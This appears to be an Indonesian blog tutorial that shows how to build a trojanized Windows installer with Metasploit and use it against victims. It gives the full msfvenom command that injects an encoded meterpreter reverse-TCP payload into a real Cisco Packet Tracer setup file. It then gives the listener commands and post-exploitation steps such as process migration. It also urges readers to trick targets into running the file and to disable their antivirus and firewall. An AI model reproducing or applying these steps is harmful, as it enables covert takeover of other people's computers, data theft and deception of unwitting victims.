Cara Hack Windows dengan Metasploit menggunakan Backdoor file Installer Di Kali Linux



Hello world..
Kali ini kami akan membagikan cara Cara Hack Windows dengan Metasploit menggunakan Backdoor file Installer Di Kali Linul atau Menyamarkan Backdoor Seperti file Installer(.exe) Di Kali Linux, Backdoor ini berguna untuk Hack & Remote Laptop/PC berSistem Operasi Windows 

Sebelum melakukan eksploitasi ke sebuah sistem kita memerlukan backdoor yang digunakan untuk jalan masuk ke sistem korban. Agar exploit tersebut berjalan user diharuskan mengeksekusi backdoor tersebut, untuk itu kita diharuskan se-kreatif mungkin agar user tersebut mengesekusi backdoor yang dikirimkan, contohnya dengan menyamarkan backdoor  menyerupai file installer aplikasi.


Sebagai contoh kali ini saya akan menyamarkan backdoor seperti Cisco Packet Tracer(kalian juga dapat mencoba dengan file installer lainnya), disini tools yang digunakan adalah msfvenom dengan encoder shikata_ga_nai.



untuk melihat opsi dari perintah msfvenom ketikkan di terminal

msfvenom -h



Contoh disini file asli installer PacketTracer533 saya berada di /root/Download/PacketTracer533_setup.exe  dan hasil file outputnya akan saya simpan di folder /root/Desktop/ciscopacket.exe

(anda bisa bebas menggunakan file installer apa saja)

msfvenom -a x86 --platform windows -x /root/Downloads/PacketTracer533_setup.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/ciscopacket.exe



Keterangan :
- a adalah architecture yang digunakan
--platform adalah platform payload yang di buat
-x posisi atau letak file exe yang hendak di injeksi
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread baru
-p perintah untuk menentukan tipe payload
windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan 
-lhost adalah alamat IP kita
-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan
x86/shikata_ga_nai adalah encoder yang digunakan
-i iterations (jumlah encode payload)
-f format output
-o output hasil file yang telah di injeksi ( backdoor result )


Oke, selanjutnya kita uji coba backdoor tersebut, buka msfconsole
Ketikan: msfconsole





Selanjutnya gunakan Perintah: 

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 4444
exploit





Sesuaikan tipe PAYLOAD, LHOST dan LPORT dengan backdoor yang dibuat di atas

Langkah selanjutnya adalah mengirimkan backdoor tersebut ke target.
gimana pun caranya, mau si target di suruh download file kita kek, atau pura2 minta anime/JAV ke target, lalu diem2 copykan file kita ke Laptop Target. *uji kelicikan anda

Dibawah ini penampakan backdoor di komputer target


saya sarankan, disable antivirus + turn off firewall dilaptop milik korban

dilihat sepintas backdoor tersebut menyerupai file installer aslinya, icon dan detailnya pun sama 


lalu copykan file ke laptop milik korban, lalu jalankan/eksekusi ^^


Dan , Sesi meterpreter terbuka  :D



untuk melihat detail info laptop korban, ketikan: sysinfo



Meterpreter session akan closed, ketika target menutup file Installer tersebut, untuk  itu segera pindah ke prosses yang lain agar kita tetap mendapat sesi meterpreter, gunakan perintah

migrate 1500

Contoh di atas saya pindah ke explorer.exe , untuk melihat Procces List ketikkan

ps
xixixhi, silahkan pilih, anda mau pinda ke proses yang mana :v

Nah disini kita sudah masuk bebas meremote pc korban.
mau jahil ?? silahkan intip perintah2nya di artikelnya om oepilcore: Hack Windows With Metasploit Using BackBox Linux *walaupun itu backbox, perintahnya sama aja kok sama kek Kali Linux

Kalau serasa sudah puas :v
silahkan ketikan perintah: exit
untuk men Shutdown Meterpreter.



Mudahkan o.O ? Stay Cool and Keep ./Crotz ,gaes :'v

Posting Komentar

0 Komentar